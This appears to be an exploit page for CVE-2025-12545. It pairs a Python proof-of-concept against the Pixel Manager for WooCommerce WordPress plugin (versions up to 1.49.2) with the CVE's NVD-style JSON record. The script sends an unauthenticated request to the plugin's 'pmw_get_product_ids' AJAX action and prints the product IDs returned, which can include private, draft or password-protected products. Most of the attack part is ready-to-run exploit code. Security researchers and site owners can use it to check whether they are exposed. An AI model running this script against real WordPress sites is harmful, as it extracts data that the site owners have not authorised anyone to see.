CVE-2025-12545

import requests import json # CVE-2025-12545 PoC - Information Exposure in Pixel Manager for WooCommerce # Target: WordPress site with Pixel Manager for WooCommerce plugin <= 1.49.2 def exploit_cve_2025_12545(target_url): """ Exploit for information disclosure vulnerability in ajax_pmw_get_product_ids() This PoC demonstrates how an unauthenticated attacker can extract protected product data. """ # Target AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Prepare the malicious request data = { 'action': 'pmw_get_product_ids', # Vulnerable AJAX action } headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } try: # Send unauthenticated request response = requests.post(ajax_url, data=data, headers=headers, timeout=10) if response.status_code == 200: result = response.json() print(f"[+] Request successful!") print(f"[+] Response: {json.dumps(result, indent=2)}") # Check if we got product IDs including protected ones if 'data' in result and 'product_ids' in result['data']: product_ids = result['data']['product_ids'] print(f"[+] Found {len(product_ids)} product IDs") print(f"[+] Product IDs: {product_ids}") return True else: print(f"[-] Request failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": # Replace with target URL target = "https://example.com" exploit_cve_2025_12545(target)

{"cve": {"id": "CVE-2025-12545", "sourceIdentifier": "[email protected]", "published": "2025-11-18T15:16:26.483", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Pixel Manager for WooCommerce – Track Conversions and Analytics, Google Ads, TikTok and more plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.49.2 via the ajax_pmw_get_product_ids() function due to insufficient restrictions on which products can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft products that they should not have access to."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/woocommerce-google-adwords-conversion-tracking-tag/tags/1.49.2/includes/pixels/class-pixel-manager.php#L1235", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/woocommerce-google-adwords-conversion-tracking-tag/tags/1.49.2/includes/pixels/class-pixel-manager.php#L343", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9babb946-4033-4e66-8f59-b73185ffcd49?source=cve", "source": "[email protected]"}]}}